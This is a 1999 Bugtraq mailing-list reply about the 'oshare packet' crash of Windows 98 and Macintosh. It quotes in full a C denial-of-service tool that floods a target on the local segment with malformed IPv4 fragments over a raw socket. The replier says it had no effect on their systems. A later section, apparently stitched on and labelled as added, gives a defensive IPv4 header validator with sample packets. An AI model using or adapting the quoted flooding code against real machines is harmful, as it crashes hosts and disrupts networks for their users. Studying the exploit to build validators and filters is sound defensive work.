[9252] in bugtraq
Re: Win98 crash?
daemon@ATHENA.MIT.EDU (Dimitris Evmorfopoulos)
Wed Jan 27 13:31:41 1999
Date: Wed, 27 Jan 1999 11:15:25 +0200
Reply-To: Dimitris Evmorfopoulos <devmorfo@ALGO.COM.GR>
From: Dimitris Evmorfopoulos <devmorfo@ALGO.COM.GR>
X-To: DEF CON ZERO WINDOW <defcon0@UGTOP.COM>
To: BUGTRAQ@NETSPACE.ORG
No matter where and how I tried to make this work, nothing happens. All Win98 systems we have here simply ignore the transmissions we send out.
DEF CON ZERO WINDOW wrote:
> Hi,
>
> Windows98 crashed by the packet which added a hand to the value of the
> IP header of the packet a little. (From now, the packet of this structure
> is called with "oshare packet".) Because it isn't familiar, I don't know
> what kind of error happens concretely inside OS to the inside of Windows.
> But, ihl and tot_len. Then, it guesses that crash will happen by the
> value of frag_bit&frag_off.
>
> But, because value is wrong, this "oshare packet" can't be transmitted
> to the outside of the network. This is here well, and it is here badly,
> too. But, even whose machine will be able to be killed in the same
> segment.
>
> Before someone improves this program, MicroSoft should take a
> countermeasure immediately.
>
> A Macintosh crashed by the "oshare packet" in the same way, too.
> But, it isn't realized by this program. It will be released soon.
>
> Reboot hangs freely if it becomes blue screen when Windows98 receives
> an "oshare packet". When blue screen comes out, the function of the
> network can't be used any more after it. The error of TCP/IP is started
> in the case of the Macintosh, and the function of the network can't be
> used any more.
>
> Is this phenomenon a bug? ヽ(´ー｀)ノ
>
> Signed by R00t Zer0
> -------------------
>
> /****************************************************************************/
> /*  [ oshare_1_gou ver 0.1 ]           -- Dressing up No.1 --               */
> /*                                                                          */
> /*                                                                          */
> /*  This program transmits the "oshare" packet which starts a machine aga-  */
> /*  in or crash. But, because it can't pass through the router, it can be   */
> /*  carried out only in the same segment.                                   */
> /*  "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha-  */
> /*  nged, it has already tested that it becomes possible to kill Mac, too.  */
> /*  -----------------------------------------                               */
> /*  Written by R00t Zer0                                                    */
> /*  E-Mail  : defcon0@ugtop.com                                             */
> /*  Web URL : http://www.ugtop.com/defcon0/index.htm                        */
> /****************************************************************************/
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <time.h>
> #include <netdb.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <netinet/in.h>
> #include <netinet/ip.h>
> #include <netinet/tcp.h>
> #include <netinet/in_systm.h>
> #include <arpa/inet.h>
>
> u_short in_cksum( u_short *, int );
> int send_oshare_packet( int, u_long );
>
> /* Standard one's-complement Internet checksum over len bytes. */
> u_short
> in_cksum( u_short *addr, int len )
> {
>     int nleft = len;
>     u_short *w = addr;
>     int sum = 0;
>     u_short answer = 0;
>
>     while( nleft > 1 )
>     {
>         sum += *w++;
>         nleft -= 2;
>     }
>
>     if (nleft == 1)
>     {
>         *( u_char *)( &answer ) = *( u_char *)w;
>         sum += answer;
>     }
>
>     sum = ( sum >> 16 ) + ( sum & 0xffff );
>     sum += ( sum >> 16 );
>     answer = ~sum;
>     return( answer );
> }
>
> int
> send_oshare_packet( int sock_send, u_long dst_addr )
> {
>     char *packet;
>     int send_status;
>     struct iphdr *ip;
>     struct sockaddr_in to;
>
>     /* Only 40 bytes are allocated and sent, but the header below claims
>        ihl 11 (a 44-byte header) and tot_len 44, and the checksum is
>        computed over 44 bytes, i.e. 4 bytes past the end of the buffer. */
>     packet = ( char *)malloc( 40 );
>     ip = ( struct iphdr *)( packet );
>     memset( packet, 0, 40 );
>
>     ip->version = 4;
>     ip->ihl = 11;
>     ip->tos = 0x00;
>     ip->tot_len = htons( 44 );
>     ip->id = htons( 1999 );
>     /* 16383 = 0x3fff: MF flag set, fragment offset 8191 (65528 bytes) */
>     ip->frag_off = htons( 16383 );
>     ip->ttl = 0xff;
>     ip->protocol = IPPROTO_UDP;
>     ip->saddr = htonl( inet_addr( "1.1.1.1" ) );
>     ip->daddr = dst_addr;
>     ip->check = in_cksum( ( u_short *)ip, 44 );
>
>     to.sin_family = AF_INET;
>     to.sin_port = htons( 0x123 );
>     to.sin_addr.s_addr = dst_addr;
>
>     send_status = sendto( sock_send, packet, 40, 0,
>                           ( struct sockaddr *)&to, sizeof( struct sockaddr ) );
>
>     free( packet );
>     return( send_status );
> }
>
> int
> main( int argc, char *argv[] )
> {
>     char tmp_buffer[ 1024 ];
>     int loop, loop2;
>
>     int sock_send;
>     u_long src_addr, dst_addr;
>     u_short src_port, dst_port;
>
>     struct hostent *host;
>     struct sockaddr_in addr;
>
>     time_t t;
>
>     if( argc != 3 )
>     {
>         printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
>         exit( -1 );
>     }
>
>     t = time( 0 );
>     srand( ( u_int )t );
>
>     /* Accept either a dotted-quad address or a host name. */
>     memset( &addr, 0, sizeof( struct sockaddr_in ) );
>     addr.sin_family = AF_INET;
>     addr.sin_addr.s_addr = inet_addr( argv[1] );
>     if( addr.sin_addr.s_addr == -1 )
>     {
>         host = gethostbyname( argv[1] );
>         if( host == NULL )
>         {
>             printf( "Unknown host %s.\n", argv[1] );
>             exit( -1 );
>         }
>         addr.sin_family = host->h_addrtype;
>         memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
>     }
>     memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );
>
>     if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
>     {
>         perror( "Getting raw send socket" );
>         exit( -1 );
>     }
>
>     printf( "\n\"Oshare Packet\" sending" );
>     fflush( stdout );
>     /* argv[2] is a count in thousands: 1000 packets per outer iteration */
>     for( loop = 0; loop < atoi( argv[2] ); loop++ )
>     {
>         for( loop2 = 0; loop2 < 1000; loop2++ )
>             send_oshare_packet( sock_send, dst_addr );
>         fprintf( stderr, "." );
>         fflush( stdout );
>     }
>     printf( "\n\nDone.\n\n" );
>     fflush( stdout );
>
>     close( sock_send );
>     exit( 0 );
> }
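From the receiving side, the interesting question is which header fields a stack (or an IDS / packet filter) must sanity-check before trusting them. The program quoted above sends a 40-byte buffer whose header claims ihl 11 (44 bytes), tot_len 44 and frag_off 0x3fff (MF set, offset 65528). The following is an added example, written for this reply and not part of the original post or of R00t Zer0's code: a small IPv4 header validator that reports the first inconsistency it finds. The three sample buffers are constructed here to mirror the field values in the quoted code; the destination address 192.0.2.10 and source 192.0.2.1 are documentation-range placeholders, the checksum field is left zero and is not verified.

```c
/* ipv4_sanity.c: report why a raw IPv4 header should be rejected.
   Added example, not from the original post. Input is the header as seen
   on the wire (network byte order) plus the number of bytes actually
   present, which is what a stack or sniffer really knows. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum ip_check {
    IP_OK = 0,
    IP_ERR_SHORT,          /* fewer than 20 bytes available */
    IP_ERR_VERSION,        /* version nibble is not 4 */
    IP_ERR_IHL_SMALL,      /* ihl < 5: header shorter than the fixed part */
    IP_ERR_IHL_BEYOND,     /* ihl*4 exceeds the bytes actually present */
    IP_ERR_TOTLEN_LT_HDR,  /* tot_len smaller than the header it announces */
    IP_ERR_TOTLEN_BEYOND,  /* tot_len exceeds the bytes actually present */
    IP_ERR_FRAG_OVERFLOW,  /* offset*8 + payload would pass 65535 */
    IP_ERR_FRAG_MF_ALIGN   /* MF set but payload not a multiple of 8 */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Returns the first violated invariant, or IP_OK. */
enum ip_check ipv4_header_check(const uint8_t *buf, size_t len)
{
    if (len < 20) return IP_ERR_SHORT;
    unsigned version = buf[0] >> 4;
    unsigned ihl = buf[0] & 0x0f;
    if (version != 4) return IP_ERR_VERSION;
    if (ihl < 5) return IP_ERR_IHL_SMALL;
    size_t hlen = ihl * 4u;
    if (hlen > len) return IP_ERR_IHL_BEYOND;
    uint16_t tot_len = rd16(buf + 2);
    if (tot_len < hlen) return IP_ERR_TOTLEN_LT_HDR;
    if (tot_len > len) return IP_ERR_TOTLEN_BEYOND;
    uint16_t fo = rd16(buf + 6);
    unsigned mf = (fo >> 13) & 1u;             /* More Fragments flag */
    uint32_t offset = (uint32_t)(fo & 0x1fff) * 8u;
    uint32_t payload = (uint32_t)tot_len - (uint32_t)hlen;
    if (offset + payload > 65535u) return IP_ERR_FRAG_OVERFLOW;
    if (mf && (payload % 8u) != 0) return IP_ERR_FRAG_MF_ALIGN;
    return IP_OK;
}

const char *ip_check_name(enum ip_check c)
{
    static const char *names[] = {
        "ok", "short", "bad version", "ihl too small", "ihl beyond data",
        "tot_len < header", "tot_len beyond data", "fragment overflows 64K",
        "MF set but payload not 8-aligned"
    };
    return names[c];
}

/* Constructed sample 1: the quoted program's header (0x4b = version 4,
   ihl 11; tot_len 44; id 1999; frag_off 0x3fff; ttl 255; UDP; 1.1.1.1 ->
   placeholder 192.0.2.10), zero padded to the 40 bytes it actually sends. */
const uint8_t OSHARE_HDR[40] = {
    0x4b, 0x00, 0x00, 0x2c, 0x07, 0xcf, 0x3f, 0xff,
    0xff, 0x11, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01,
    0xc0, 0x00, 0x02, 0x0a
};

/* Constructed sample 2: same flags/offset but a plausible ihl of 5 and
   44 bytes present, so only the fragment arithmetic is wrong. */
const uint8_t FRAG_OVERFLOW_HDR[44] = {
    0x45, 0x00, 0x00, 0x2c, 0x07, 0xcf, 0x3f, 0xff,
    0xff, 0x11, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01,
    0xc0, 0x00, 0x02, 0x0a
};

/* Constructed sample 3: an ordinary 28-byte UDP datagram header
   (DF set, no fragmentation), placeholder 192.0.2.1 -> 192.0.2.10. */
const uint8_t NORMAL_HDR[28] = {
    0x45, 0x00, 0x00, 0x1c, 0x00, 0x01, 0x40, 0x00,
    0x40, 0x11, 0x00, 0x00, 0xc0, 0x00, 0x02, 0x01,
    0xc0, 0x00, 0x02, 0x0a
};

int main(void)
{
    printf("oshare (40 bytes)   : %s\n", ip_check_name(ipv4_header_check(OSHARE_HDR, sizeof OSHARE_HDR)));
    printf("frag-only (44 bytes): %s\n", ip_check_name(ipv4_header_check(FRAG_OVERFLOW_HDR, sizeof FRAG_OVERFLOW_HDR)));
    printf("normal (28 bytes)   : %s\n", ip_check_name(ipv4_header_check(NORMAL_HDR, sizeof NORMAL_HDR)));
    printf("normal truncated    : %s\n", ip_check_name(ipv4_header_check(NORMAL_HDR, 20)));
    return 0;
}
```

The order of the checks matters: ihl is validated against the bytes actually present before tot_len is read, and tot_len before the fragment offset is combined with the payload length, so each later check only runs on fields that are already known to lie inside the buffer. That is the property the quoted packet exercises, since its ihl alone already points past the 40 bytes that were sent.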